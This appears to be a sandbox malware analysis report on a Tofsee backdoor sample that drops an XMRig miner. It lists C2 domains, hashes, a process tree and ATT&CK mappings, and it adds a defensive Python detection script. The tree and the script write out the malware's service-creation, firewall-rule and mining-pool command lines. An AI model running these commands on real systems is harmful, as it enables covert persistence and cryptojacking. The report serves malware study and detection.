Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220112
  • submitted
    23-01-2022 09:47

General

  • Target

    fe5e449f4a7f459cfd24a3434aeda3b4ff6794f654186ac9f0dc63cf5bf49462.exe

  • Size

    268KB

  • MD5

    80d02fdb640a9dd6d5baee4362fc5232

  • SHA1

    60a43d7260110c48cd256d8e23e5beb55cbb10b6

  • SHA256

    fe5e449f4a7f459cfd24a3434aeda3b4ff6794f654186ac9f0dc63cf5bf49462

  • SHA512

    55d5ca89f7e559b1ce0357c0f15916c91fc29122da154cd2ccd489256779b053d7569b1ef2181501d5f98622461bfddfa7634d1eff71e860cc61f4acf8b17f55

Malware Config

Extracted

Family

tofsee

C2

patmushta.info

ovicrush.cn

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 2 IoCs
  • Creates new service(s) 1 TTPs
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). The sandbox's generic description calls this likely ransomware behaviour; for this sample it is a heuristic hit only, since the extracted config and payload are Tofsee and an XMRig miner and no file-encryption activity appears in the process tree.

  • Program crash 2 IoCs
  • Modifies data under HKEY_USERS 51 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\fe5e449f4a7f459cfd24a3434aeda3b4ff6794f654186ac9f0dc63cf5bf49462.exe
    "C:\Users\Admin\AppData\Local\Temp\fe5e449f4a7f459cfd24a3434aeda3b4ff6794f654186ac9f0dc63cf5bf49462.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3448
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\mukpoygc\
      2⤵
      PID:3916
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\ulhagdhn.exe" C:\Windows\SysWOW64\mukpoygc\
      2⤵
      PID:204
    • C:\Windows\SysWOW64\sc.exe
      "C:\Windows\System32\sc.exe" create mukpoygc binPath= "C:\Windows\SysWOW64\mukpoygc\ulhagdhn.exe /d\"C:\Users\Admin\AppData\Local\Temp\fe5e449f4a7f459cfd24a3434aeda3b4ff6794f654186ac9f0dc63cf5bf49462.exe\"" type= own start= auto DisplayName= "wifi support"
      2⤵
      PID:4040
    • C:\Windows\SysWOW64\sc.exe
      "C:\Windows\System32\sc.exe" description mukpoygc "wifi internet conection"
      2⤵
      PID:1424
    • C:\Windows\SysWOW64\sc.exe
      "C:\Windows\System32\sc.exe" start mukpoygc
      2⤵
      PID:3276
    • C:\Windows\SysWOW64\netsh.exe
      "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
      2⤵
      PID:2112
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3448 -s 1252
      2⤵
      • Program crash
      PID:1796
  • C:\Windows\SysWOW64\mukpoygc\ulhagdhn.exe
    C:\Windows\SysWOW64\mukpoygc\ulhagdhn.exe /d"C:\Users\Admin\AppData\Local\Temp\fe5e449f4a7f459cfd24a3434aeda3b4ff6794f654186ac9f0dc63cf5bf49462.exe"
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:3472
    • C:\Windows\SysWOW64\svchost.exe
      svchost.exe
      2⤵
      • Drops file in System32 directory
      • Suspicious use of SetThreadContext
      • Modifies data under HKEY_USERS
      • Suspicious use of WriteProcessMemory
      PID:3620
      • C:\Windows\SysWOW64\svchost.exe
        svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3232
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3472 -s 536
      2⤵
      • Program crash
      PID:2864
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3448 -ip 3448
    1⤵
    PID:2208
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 3472 -ip 3472
    1⤵
    PID:3716
  • C:\Windows\System32\WaaSMedicAgent.exe
    C:\Windows\System32\WaaSMedicAgent.exe 40f7d544a382e9b83ce9b47054a5a5a1 u3pCchQsYkujnCz7FYwSeA.0.1.0.0.0
    1⤵
    • Modifies data under HKEY_USERS
    PID:640
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p
    1⤵
    PID:1956
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k wusvcs -p
    1⤵
    PID:452
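The tree above records the whole persistence and payload chain in four command lines: a dropped binary is moved from the user's Temp folder into a new subfolder of SysWOW64, registered as an auto-start service with a benign-looking display name, an inbound firewall allow rule is added for svchost.exe, and a svchost.exe child then runs with miner arguments (-o pool:port, -u wallet, -a cn/half), which the real svchost.exe never takes since it is launched with -k <service group>, consistent with the SetThreadContext and WriteProcessMemory signatures on its parent. The script below is an added example of detection logic over those lines; it is not part of the sandbox report or any vendor rule set. The command lines in SAMPLE_CMDLINES are copied from the tree (the two "-k <group>" svchost.exe lines are the legitimate ones from the same tree and serve as negative controls); the rule names, the path heuristics and the Finding structure are my own assumptions.

```python
"""Heuristic detections over process command lines (added example, not the sandbox's code)."""
import re
from dataclasses import dataclass, field

# Assumed heuristics: a service image living in a *subfolder* of the system
# directory, or anywhere user-writable, is treated as suspicious.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\")

# Copied from the process tree above; the last two lines are the benign controls.
SAMPLE_CMDLINES = [
    r'"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\mukpoygc' + "\\",
    r'"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\ulhagdhn.exe" C:\Windows\SysWOW64\mukpoygc' + "\\",
    r'"C:\Windows\System32\sc.exe" create mukpoygc binPath= "C:\Windows\SysWOW64\mukpoygc\ulhagdhn.exe /d\"C:\Users\Admin\AppData\Local\Temp\fe5e449f4a7f459cfd24a3434aeda3b4ff6794f654186ac9f0dc63cf5bf49462.exe\"" type= own start= auto DisplayName= "wifi support"',
    r'"C:\Windows\System32\sc.exe" description mukpoygc "wifi internet conection"',
    r'"C:\Windows\System32\sc.exe" start mukpoygc',
    r'"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul',
    r'svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half',
    r'C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p',
    r'C:\Windows\system32\svchost.exe -k wusvcs -p',
]


@dataclass
class Finding:
    rule: str
    cmdline: str
    details: dict = field(default_factory=dict)


def in_system_subdir(path):
    """True if path is under System32/SysWOW64 but inside an extra subfolder."""
    p = path.lower()
    for d in SYSTEM_DIRS:
        if p.startswith(d):
            return "\\" in p[len(d):]
    return False


def in_user_writable(path):
    return any(marker in path.lower() for marker in USER_WRITABLE)


def check_staging(cmd):
    """cmd.exe move/copy of a file from a user-writable location into the system dir."""
    m = re.search(r'\b(?:move|copy)\b(?:\s+/\w+)*\s+"?(.+?)"?\s+"?([a-z]:\\windows\\sys(?:tem32|wow64)\\[^"\s]*)', cmd, re.I)
    if m and in_user_writable(m.group(1)):
        return Finding("staging_into_system_dir", cmd, {"source": m.group(1), "destination": m.group(2)})
    return None


def check_service_create(cmd):
    """sc create whose binPath image is in a system subfolder or a user-writable path."""
    m = re.search(r'\bsc(?:\.exe)?"?\s+create\s+(\S+)\s+(.*)', cmd, re.I)
    if not m:
        return None
    name, rest = m.group(1), m.group(2)
    # binPath may carry escaped inner quotes (as above), so stop at the next sc keyword or end of line.
    bp = re.search(r'binPath=\s*"?(.+?)"?(?:\s+(?:type|start|error|group|tag|depend|obj|password|DisplayName)=|\s*$)', rest, re.I)
    if not bp:
        return None
    image = bp.group(1).split()[0]  # first token; adequate for an unquoted, space-free image path
    start = re.search(r'\bstart=\s*(\w+)', rest, re.I)
    display = re.search(r'DisplayName=\s*"([^"]*)"', rest, re.I)
    if in_system_subdir(image) or in_user_writable(image):
        return Finding("service_image_outside_standard_dirs", cmd, {
            "service": name, "image": image,
            "start": start.group(1).lower() if start else None,
            "display_name": display.group(1) if display else None})
    return None


def check_firewall(cmd):
    """netsh inbound allow rule for svchost.exe or for a user-writable program path."""
    m = re.search(r'advfirewall\s+firewall\s+add\s+rule\b(.*)', cmd, re.I)
    if not m:
        return None
    rest = re.sub(r'\s*>\s*nul\s*$', '', m.group(1), flags=re.I)  # drop the trailing >nul redirection
    kv = {k.lower(): v.strip('"') for k, v in re.findall(r'(\w+)=("[^"]*"|\S+)', rest)}
    program = kv.get("program", "")
    if kv.get("dir", "").lower() == "in" and kv.get("action", "").lower() == "allow":
        if program.lower().endswith("\\svchost.exe") or in_user_writable(program):
            return Finding("firewall_inbound_allow_suspicious_program", cmd,
                           {"rule_name": kv.get("name"), "program": program})
    return None


def check_miner(cmd):
    """XMRig-style arguments: pool (-o/--url) plus wallet (-u/--user); records the host image too."""
    pool = re.search(r'(?:^|\s)(?:-o|--url)[=\s]+(\S+)', cmd)
    user = re.search(r'(?:^|\s)(?:-u|--user)[=\s]+(\S+)', cmd)
    algo = re.search(r'(?:^|\s)(?:-a|--algo)[=\s]+(\S+)', cmd)
    if not (pool and user):
        return None
    host, _, port = pool.group(1).rpartition(":")
    image = cmd.split()[0].strip('"')
    return Finding("miner_cmdline", cmd, {
        "image": image, "pool_host": host, "pool_port": port, "user": user.group(1),
        "algo": algo.group(1) if algo else None,
        "hosted_in_system_binary": image.lower().endswith("svchost.exe")})


CHECKS = (check_staging, check_service_create, check_firewall, check_miner)


def analyze(cmdlines):
    """Run every check over every command line; findings keep input order."""
    return [f for cmd in cmdlines for f in (chk(cmd) for chk in CHECKS) if f]


if __name__ == "__main__":
    for f in analyze(SAMPLE_CMDLINES):
        print(f.rule, f.details)
```

The service finding gives the artifacts to hunt for on other hosts (service name, image path under SysWOW64\<random>\, display name "wifi support"), and the firewall finding the rule name to look for; the miner finding is the one to alert on immediately, since a svchost.exe carrying a pool address is never legitimate.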

                      Network

MITRE ATT&CK Matrix (ATT&CK v6)

  • Persistence
    New Service (T1050): 1
    Modify Existing Service (T1031): 1
    Registry Run Keys / Startup Folder (T1060): 1

  • Privilege Escalation
    New Service (T1050): 1

  • Defense Evasion
    Modify Registry (T1112): 1

  • Discovery
    Query Registry (T1012): 1
    System Information Discovery (T1082): 2

                      Downloads

                      • C:\Users\Admin\AppData\Local\Temp\ulhagdhn.exe
                        MD5

                        190989b6147aab8b596b5f9d20ee9e5b

                        SHA1

                        3cd6a6287f61793f407a5b854ae712f690a58d5d

                        SHA256

                        18eb682a0e8243124cb4be8f9636bd046f048473be1b9ceb4959aa78b5de14ae

                        SHA512

                        99f87a3d0fea8f4a25b2715bb90dc8d69cedbaba92c6ca6fa67c828d923e5c4f5037cffe850cde36ed0e8672cec7f76285ef6d129f8360929dbd3ff95a9cc52c

                      • C:\Windows\SysWOW64\mukpoygc\ulhagdhn.exe
                        MD5

                        190989b6147aab8b596b5f9d20ee9e5b

                        SHA1

                        3cd6a6287f61793f407a5b854ae712f690a58d5d

                        SHA256

                        18eb682a0e8243124cb4be8f9636bd046f048473be1b9ceb4959aa78b5de14ae

                        SHA512

                        99f87a3d0fea8f4a25b2715bb90dc8d69cedbaba92c6ca6fa67c828d923e5c4f5037cffe850cde36ed0e8672cec7f76285ef6d129f8360929dbd3ff95a9cc52c

                      • memory/3232-157-0x0000000000700000-0x00000000007F1000-memory.dmp
                        Filesize

                        964KB

                      • memory/3232-153-0x0000000000700000-0x00000000007F1000-memory.dmp
                        Filesize

                        964KB

                      • memory/3448-130-0x00000000004B0000-0x00000000004BD000-memory.dmp
                        Filesize

                        52KB

                      • memory/3448-131-0x00000000004C0000-0x00000000004D3000-memory.dmp
                        Filesize

                        76KB

                      • memory/3448-132-0x0000000000400000-0x000000000044A000-memory.dmp
                        Filesize

                        296KB

                      • memory/3472-140-0x0000000000400000-0x000000000044A000-memory.dmp
                        Filesize

                        296KB

                      • memory/3472-139-0x00000000005C0000-0x00000000005D3000-memory.dmp
                        Filesize

                        76KB

                      • memory/3472-138-0x00000000004B0000-0x00000000004BD000-memory.dmp
                        Filesize

                        52KB

                      • memory/3620-141-0x0000000004800000-0x0000000004A0F000-memory.dmp
                        Filesize

                        2.1MB

                      • memory/3620-143-0x0000000003910000-0x0000000003916000-memory.dmp
                        Filesize

                        24KB

                      • memory/3620-145-0x0000000003920000-0x0000000003930000-memory.dmp
                        Filesize

                        64KB

                      • memory/3620-147-0x00000000039F0000-0x00000000039F5000-memory.dmp
                        Filesize

                        20KB

                      • memory/3620-149-0x0000000009740000-0x0000000009B4B000-memory.dmp
                        Filesize

                        4.0MB

                      • memory/3620-151-0x0000000004CF0000-0x0000000004CF7000-memory.dmp
                        Filesize

                        28KB

                      • memory/3620-135-0x0000000000380000-0x0000000000395000-memory.dmp
                        Filesize

                        84KB